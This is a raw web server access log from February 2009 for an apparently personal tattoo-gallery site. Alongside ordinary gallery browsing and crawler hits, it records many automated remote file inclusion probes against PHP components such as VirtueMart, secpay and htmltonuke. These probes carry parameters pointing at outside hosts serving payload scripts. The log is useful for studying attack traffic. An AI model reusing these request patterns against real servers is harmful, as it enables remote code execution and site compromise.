71.113.37.251 - - [04/Feb/2009:21:05:50 -0600] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.103.92.58 - - [04/Feb/2009:21:09:25 -0600] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.103.92.58 - - [04/Feb/2009:21:09:26 -0600] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
71.113.37.251 - - [04/Feb/2009:21:10:31 -0600] "GET /logs/access_log.1214179200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.103.92.58 - - [04/Feb/2009:21:10:45 -0600] "GET /logs/access_log.1217203200//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
77.221.130.2 - - [04/Feb/2009:21:12:47 -0600] "GET /?_zb_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.221.130.2 - - [04/Feb/2009:21:12:47 -0600] "GET /logs/access_log.1216944000/?_zb_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.221.130.2 - - [04/Feb/2009:21:12:48 -0600] "GET /logs/?_zb_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 200 117460 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.71.191.223 - - [04/Feb/2009:21:14:49 -0600] "GET //index.php/index.php?mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
77.221.130.2 - - [04/Feb/2009:21:16:24 -0600] "GET /?_zb_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
77.221.130.2 - - [04/Feb/2009:21:16:24 -0600] "GET /logs/access_log.1216944000/?_zb_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.2 - - [04/Feb/2009:21:16:25 -0600] "GET /logs/?_zb_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 200 117460 "-""Mozilla/5.0"
72.3.139.15 - - [04/Feb/2009:21:19:20 -0600] "GET /logs/access_log.1211500800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:21:19:20 -0600] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [04/Feb/2009:21:19:20 -0600] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [04/Feb/2009:21:19:40 -0600] "GET /logs/errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.2 - - [04/Feb/2009:21:19:40 -0600] "GET /errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.2 - - [04/Feb/2009:21:19:40 -0600] "GET /logs/access_log.1218067200/errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.3.139.15 - - [04/Feb/2009:21:19:43 -0600] "GET /logs/access_log.1219017600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.249.116.188 - - [04/Feb/2009:21:20:02 -0600] "GET /logs/access_log.1211500800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [04/Feb/2009:21:20:02 -0600] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [04/Feb/2009:21:20:02 -0600] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
66.235.124.29 - - [04/Feb/2009:21:20:27 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.29 - - [04/Feb/2009:21:20:43 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
87.249.116.188 - - [04/Feb/2009:21:20:50 -0600] "GET /logs/access_log.1219017600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [04/Feb/2009:21:21:04 -0600] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [04/Feb/2009:21:21:04 -0600] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [04/Feb/2009:21:21:04 -0600] "GET /logs/access_log.1211500800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [04/Feb/2009:21:21:29 -0600] "GET /logs/access_log.1219017600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.126.131.239 - - [04/Feb/2009:21:22:41 -0600] "GET /logs/access_log.1211500800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.126.131.239 - - [04/Feb/2009:21:22:41 -0600] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.126.131.239 - - [04/Feb/2009:21:22:41 -0600] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
113.130.70.19 - - [04/Feb/2009:21:22:55 -0600] "GET /logs/access_log.1215216000%20%20/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:21:22:55 -0600] "GET /encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:21:22:55 -0600] "GET /logs/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.126.131.239 - - [04/Feb/2009:21:23:14 -0600] "GET /logs/access_log.1219017600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
98.211.107.146 - - [04/Feb/2009:21:23:37 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__8xDtV4NJiNCNR_vrV-IGhEHOMe4=&h=194&w=225&sz=13&hl=en&start=97&um=1&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&prev=/images%3Fq%3Dold%2Bschool%2Bflash%26start%3D80%26ndsp%3D20%26um%3D1%26hl%3Den%26rls%3Dcom.microsoft:*:IE-SearchBox%26rlz%3D1I7ADBS_en%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:37 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:37 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
113.130.70.19 - - [04/Feb/2009:21:23:47 -0600] "GET /logs/access_log.1214524800%20%20/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:52 -0600] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:53 -0600] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:53 -0600] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:53 -0600] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:23:53 -0600] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.191.95.106 - - [04/Feb/2009:21:24:06 -0600] "GET /logs/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:24:06 -0600] "GET /logs/access_log.1215216000/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:24:06 -0600] "GET /htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:24:06 -0600] "GET /logs/access_log.1215129600/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:24:22 -0600] "GET /logs/access_log.1215216000%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:24:22 -0600] "GET /logs/access_log.1215129600%20%20/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.232.84.2 - - [04/Feb/2009:21:24:24 -0600] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
77.232.84.2 - - [04/Feb/2009:21:24:24 -0600] "GET /logs/access_log.1211500800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
77.232.84.2 - - [04/Feb/2009:21:24:24 -0600] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:40 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:24:41 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
77.232.84.2 - - [04/Feb/2009:21:24:53 -0600] "GET /logs/access_log.1216080000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
72.3.139.15 - - [04/Feb/2009:21:25:16 -0600] "GET /logs/access_log.1216080000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
98.211.107.146 - - [04/Feb/2009:21:25:19 -0600] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:19 -0600] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:19 -0600] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:25:20 -0600] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
77.232.84.2 - - [04/Feb/2009:21:25:20 -0600] "GET /logs/access_log.1219017600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
77.232.84.2 - - [04/Feb/2009:21:25:30 -0600] "GET /logs/access_log.1213660800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 9.21; rv:1.8b9) Gecko/20050720 Minimo/0.007"
72.3.139.15 - - [04/Feb/2009:21:25:57 -0600] "GET /logs/access_log.1213660800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
98.211.107.146 - - [04/Feb/2009:21:26:05 -0600] "GET /tattoo/set4.htm HTTP/1.1" 200 1694 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:05 -0600] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
